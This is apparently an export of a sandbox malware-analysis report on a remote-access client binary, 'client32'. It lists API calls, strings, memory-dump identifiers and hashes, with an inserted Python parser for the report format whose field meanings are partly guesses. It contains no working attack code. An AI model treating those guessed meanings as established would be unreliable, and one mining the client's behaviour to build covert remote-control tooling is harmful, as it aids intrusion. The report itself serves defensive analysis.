• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
• String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
• API String ID: 3234921582-2664294811
• Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
• Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
• Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
• Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
APIs
  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
• FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
• String ID: SetProcessDpiAwareness$shcore.dll
• API String ID: 1108920153-1959555903
• Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
• Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
• Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
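The entries above follow a fixed layout: an APIs list (direct calls plus "Part of subcall function" helpers), a Memory Dump Source block whose .sdmp identifiers encode where the code was captured, and a Similarity block with the function's strings. The following parser is an added example; it is not part of the Joe Sandbox report and not Joe Sandbox's own code. Its reading of the identifier fields is inferred from the page: the source dump 0000000A.00000002.2510623884.0000000011001000.00000020.... appears next to the snapshot hcaresult_10_2_11000000_client32.jbxd, so the first field is the PID (0xA = 10), the second the analysis stage (2) and the fourth the region base (0x11001000 here, inside the image at 0x11000000). Treating the fifth field as a Win32 page-protection value (0x20 = PAGE_EXECUTE_READ, 0x02 = PAGE_READONLY, 0x04 = PAGE_READWRITE) is this example's assumption. The sample input is the page's own entry for the function at 111466CF, abridged; it also shows how the "Download File" link text that the HTML export glues onto each "Associated:" line is dropped.

```python
"""Parse Joe Sandbox function entries and decode their memory-dump identifiers.
Added example, not Joe Sandbox code. Field meanings are inferred from the report:
the identifier ending .0000000011001000.00000020.... sits beside the snapshot
hcaresult_10_2_11000000_client32.jbxd, so field 1 is the PID (0xA = 10), field 2
the stage (2) and field 4 the base (0x11001000). Reading field 5 as a Win32 page
protection (0x20 = PAGE_EXECUTE_READ) is an assumption of this example."""
import re
from dataclasses import dataclass, field

PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
DUMP_ID = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\."
                     r"([0-9A-F]{8})\.[0-9A-F]{8}\.[0-9A-F]{8}\.([0-9A-F]{8})\.sdmp$")
API = re.compile(r"^•\s*(\w+)\.([A-Z0-9_]+)(?:\(([^)]*)\))?(?:,?\s*ref:\s*([0-9A-F]+))?")
SUBCALL = re.compile(r"^•\s*Part of subcall function ([0-9A-F]+):\s*(.*)$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity")

@dataclass
class DumpRegion:
    pid: int
    stage: int
    base: int
    protection: int
    module: int

    @property
    def executable(self) -> bool:
        return bool(self.protection & 0xF0)  # PAGE_EXECUTE* values are 0x10..0x80

    def describe(self) -> str:
        prot = PAGE_PROTECTION.get(self.protection, f"0x{self.protection:02X}")
        return f"pid={self.pid} stage={self.stage} base=0x{self.base:08X} {prot}"

def parse_dump_id(name: str) -> DumpRegion:
    """Decode one .sdmp name, dropping the 'Download File' link text that the
    HTML export glues onto 'Associated:' lines."""
    name = name.strip()
    if name.endswith("Download File"):
        name = name[:-len("Download File")].strip()
    m = DUMP_ID.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return DumpRegion(*(int(g, 16) for g in m.groups()))

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)      # (name, lib, args, ref) per direct call
    subcalls: list = field(default_factory=list)  # (callee address, api name)
    regions: list = field(default_factory=list)   # Source File first, then Associated
    strings: list = field(default_factory=list)   # Similarity 'String ID' values

def parse_report(text: str) -> list:
    """Split report text into entries; each starts at an 'APIs' heading."""
    entries, section = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":
                entries.append(FunctionEntry())
            section = line
        elif not entries or not line.startswith("•"):
            continue
        elif section == "APIs":
            sub = SUBCALL.match(line)
            m = API.match("• " + sub.group(2) if sub else line)
            if m and sub:
                entries[-1].subcalls.append((sub.group(1), m.group(1)))
            elif m:
                entries[-1].apis.append(m.groups())
        elif section == "Memory Dump Source":
            entries[-1].regions.append(parse_dump_id(line.split(":", 1)[1].split(",", 1)[0]))
        elif section == "Similarity" and line.startswith("• String ID:"):
            entries[-1].strings = line.split(":", 1)[1].strip().split("$")
    return entries

def triage(entries: list) -> list:
    """One row per function: where it lives, what it and its helpers call, and
    which imports it resolves at run time through GetProcAddress."""
    rows = []
    for e in entries:
        src = e.regions[0] if e.regions else None
        rows.append({
            "region": src.describe() if src else "?",
            "executable": bool(src and src.executable),
            "apis": [name for name, *_ in e.apis],
            "helper_apis": sorted({name for _, name in e.subcalls}),
            "resolved_at_runtime": [args.split(",")[-1] for name, _, args, _ in e.apis
                                    if name == "GetProcAddress" and args],
            "strings": e.strings,
        })
    return rows

# Constructed input: the report's entry for the function at 111466CF, abridged.
REPORT_EXCERPT = r"""
APIs
  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
• FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Similarity
• String ID: SetProcessDpiAwareness$shcore.dll
"""

if __name__ == "__main__":
    for row in triage(parse_report(REPORT_EXCERPT)):
        print(row)
```

Feeding the whole report export through parse_report gives one FunctionEntry per "APIs" heading, and triage then separates code captured in executable regions from data regions and lists every import the client resolves at run time, which for this entry is SetProcessDpiAwareness from shcore.dll.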
APIs
• wsprintfA.USER32 ref: 11031FE6
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$358075$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-419004844
• Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
• Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
• Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
• Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
APIs
• GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
• __strdup.LIBCMT ref: 11145277
  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
• _free.LIBCMT ref: 111452AC
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
APIs
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
• _free.LIBCMT ref: 1100EE64
  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
• _free.LIBCMT ref: 1100EE77
• _free.LIBCMT ref: 1100EE8A
• _free.LIBCMT ref: 1100EE9D
Similarity
• API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
APIs
  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
• wsprintfA.USER32 ref: 1114650E
• wsprintfA.USER32 ref: 11146524
  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
Similarity
• API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
• String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
APIs
• CoInitialize.OLE32(00000000), ref: 110F4B8A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
• TranslateMessage.USER32(?), ref: 110F4BC4
• DispatchMessageA.USER32(?), ref: 110F4BCA
• CoUninitialize.OLE32 ref: 110F4BE6
Similarity
• API ID: Message$DispatchInitializeTranslateUninitialize
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,76968400,?), ref: 11143E97
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
• CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile$CloseHandle
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 1443461169-123907689
                                                                                                                                                    • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                                    • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                                                    • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                                                                                                    • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1EF76653,75732EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                      • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
• String ID: Client$DisableGeolocation
• API String ID: 3315423714-4166767992
• Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
• Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
• Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
• Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
• TranslateMessage.USER32(?), ref: 11027850
• DispatchMessageA.USER32(?), ref: 11027856
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
• String ID: Exit Msgloop, quit=%d
• API String ID: 3212272093-2210386016
• Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
• Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
• Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
• Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
APIs
• GetTickCount.KERNEL32 ref: 110179ED
  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101792C
  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017842
  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
• SetEvent.KERNEL32(00000310), ref: 11017A0D
• GetTickCount.KERNEL32 ref: 11017A13
Strings
• touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
• String ID: touchkbd, systype=%d, chassis=%d, took %d ms
• API String ID: 3804766296-4122679463
• Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
• Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
• Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
• Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1

APIs
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CA84FC4
• K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CA88E0D,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FE4
• SetLastError.KERNEL32(00000078,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FED
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressEnumErrorLastModulesProcProcess
• String ID: EnumProcessModules
• API String ID: 3858832252-3735562946
• Opcode ID: a8ba9b0f871dcc9260ab77d0d5e70bd6b340c7d19ce6c80ec6663c6273d72b53
• Instruction ID: 6eeba364c6817eaaa20c2923811345a7ed41a5a97133b88377759391c552a23e
• Opcode Fuzzy Hash: a8ba9b0f871dcc9260ab77d0d5e70bd6b340c7d19ce6c80ec6663c6273d72b53
• Instruction Fuzzy Hash: 84F058B2604328AFC714DFA8D844E9B77ACFB48721F00C91AF95A97A40C670E850CBA0

APIs
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
• K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
• SetLastError.KERNEL32(00000078,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA8503D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorFileLastModuleNameProc
• String ID: GetModuleFileNameExA
• API String ID: 4084229558-758377266
• Opcode ID: e203d8fb7d94ab59d6d0e3fdd027ac4d2fde30802a2ce2949491f3459cffb7c1
• Instruction ID: d7a843484dbbe03eba64e41c6ae2311331dad201f7ba36d52c6e4928757c3ae8
• Opcode Fuzzy Hash: e203d8fb7d94ab59d6d0e3fdd027ac4d2fde30802a2ce2949491f3459cffb7c1
• Instruction Fuzzy Hash: 38F05EB2601318AFD724CF94E804A9777B8EB48710F00891AF946D7640C671E9508BB1

APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
• CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateHandleThread__wcstoi64
• String ID: *AutoICFConfig$Client
• API String ID: 3257255551-59951473
• Opcode ID: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
• Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
• Opcode Fuzzy Hash: 8ef9440ca52eb6c28e2eb8d9bc5eaacf11d3a77b41f44fd575e1b178a618d9bf
• Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755

APIs
• Sleep.KERNEL32(000000FA), ref: 11070FE7
• EnterCriticalSection.KERNEL32(?), ref: 11070FF4
• LeaveCriticalSection.KERNEL32(?), ref: 110710C6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeaveSleep
• String ID: Push
• API String ID: 1566154052-4278761818
• Opcode ID: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
• Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
• Opcode Fuzzy Hash: 74813a05ea0db766d7d3990c23e63c1b548e25f4805cfc9f05432d5c18842b54
• Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90

APIs
• EnterCriticalSection.KERNEL32(6CACB898,00000000,?,?,?,6CA8DA7F,?,00000000), ref: 6CA8A503
• InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8A568
• Sleep.KERNEL32(00000000,?,6CA8DA7F,?,00000000), ref: 6CA8A581
• LeaveCriticalSection.KERNEL32(6CACB898,00000000), ref: 6CA8A5B3
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
• String ID:
• API String ID: 4212191310-0
• Opcode ID: 2a17471eac546953375622a43136d83da86e3f446221c536074ec4ff4675b14a
• Instruction ID: 7a937ad65ce76fd2469be56c8571006c7942209f65c6245caae16a6d6f2099f7
• Opcode Fuzzy Hash: 2a17471eac546953375622a43136d83da86e3f446221c536074ec4ff4675b14a
• Instruction Fuzzy Hash: 222149B2F023019FDB198F49D84078AB3BAEF82318F094517D86693AC0D331BDC58B52

APIs
• WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
• CloseHandle.KERNEL32(?), ref: 11030DC9
• FreeLibrary.KERNEL32(?), ref: 11030DD4
• CloseHandle.KERNEL32(00000000), ref: 11030DDB
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1314093303-0
                                                                                                                                                    • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                                                    • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
